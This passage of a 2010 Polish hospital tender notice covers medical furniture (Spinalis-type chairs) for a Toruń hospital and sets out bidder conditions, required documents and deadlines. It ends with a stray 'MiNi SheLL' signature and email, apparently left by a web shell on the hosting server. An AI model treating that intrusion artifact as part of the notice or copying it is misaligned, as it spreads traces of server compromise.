48. Krzesło typu Spinalis Apollo lub równoważne, o następujących parametrach: ruchome siedzisko ukształtowane ergonomicznie, gwarantujące optymalną pozycję ciała podczas siedzenia. Atrakcyjny i elegancki styl oparcia zapewniający zdrowe wspomaganie części grzbietowej i biodrowej kręgosłupa. Krzesło zapobiegające siedzeniu w nieprawidłowej pozycji, posiadające regulowaną wysokość siedziska oraz oparcie z podłokietnikami. Siedzisko i oparcie pokryte materiałem przewiewnym, zmywalnym, odpornym na tarcie, wodę, pot i światło (100% bawełny powleczonej poliuretanem). Wytrzymałość min. 110 kg. Kolorystyka: min. 6 kolorów do wyboru, 63 x 63 x 104-126 - 5 szt.					
49. Krzesło typu Spinalis Spider lub równoważne, o następujących parametrach: siedzisko z regulowaną wysokością, poruszające się we wszystkie strony. Siedzisko i oparcie pokryte materiałem zamszopodobnym (68% PES, 32% PU). Kolorystyka: min. 6 kolorów do wyboru. Wytrzymałość min. 110 kg, 63 x 63 x 105 - 4 szt.	 
50. Krzesło typu Spinalis Navigator lub równoważne, o następujących parametrach: ruchome siedzisko, ustawiające ciało w optymalnej pozycji i dostosowujące się do  ruchów, z regulowaną wysokością. Oparcie poruszające się wraz z ciałem i podpierające kręgosłup. Specjalnie ukształtowane poduszki w części biodrowej układu kostnego zapewniające dodatkowy komfort. Oparcie kręgosłupa i podłokietniki umocowane niezależnie od siedziska, posiadające możliwość regulacji wysokości. Siedzisko i oparcie pokryte materiałem estetycznym, wytrzymałym i łatwo zmywalnym (50% bawełna, 50% PU). Kolorystyka: min. 6 kolorów do wyboru, 67 x 67 x 113-135	- 10 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych min. 2 dostaw mebli medycznych o wartości min. 60.000,00 zł brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty 200.000,00 zł wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         /Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku         udziału/.
      Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

     Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) atest higieniczny - dotyczy wyrobów gotowych

 b) świadectwo / deklaracja producenta, że oferowany przedmiot zamówienia jest dopuszczony do stosowania w służbie zdrowia na zasadach ogólnych

 c) katalogi/prospekty, zdjęcia mebli medycznych zawierające nazwę ich producenta 
i nr katalogowy

 d) wpis do rejestru wyrobów medycznych - dotyczy stolików opatrunkowo- zabiegowych oraz kozetek lekarskich.
 
 e) certyfikat uprawniający do oznaczania wyrobu znakiem bezpieczeństwa konstrukcji nośnej    mebla i kartę charakterystyki produktu dotyczącą złączy korpusu.

f) certyfikat ISO dla producenta</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.
- Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2010 godzina 09:00, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> - Zakup w ramach realizacji projektu nr PL 0480 pn. /Zwiększenie dostępności wysokospecjalistycznej opieki kardiologicznej w Wojewódzkim Szpitalu Zespolonym w Toruniu współfinansowany w 85 % przez Mechanizm Finansowy - EOG i w 15% przez Budżet Województwa/.
- Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com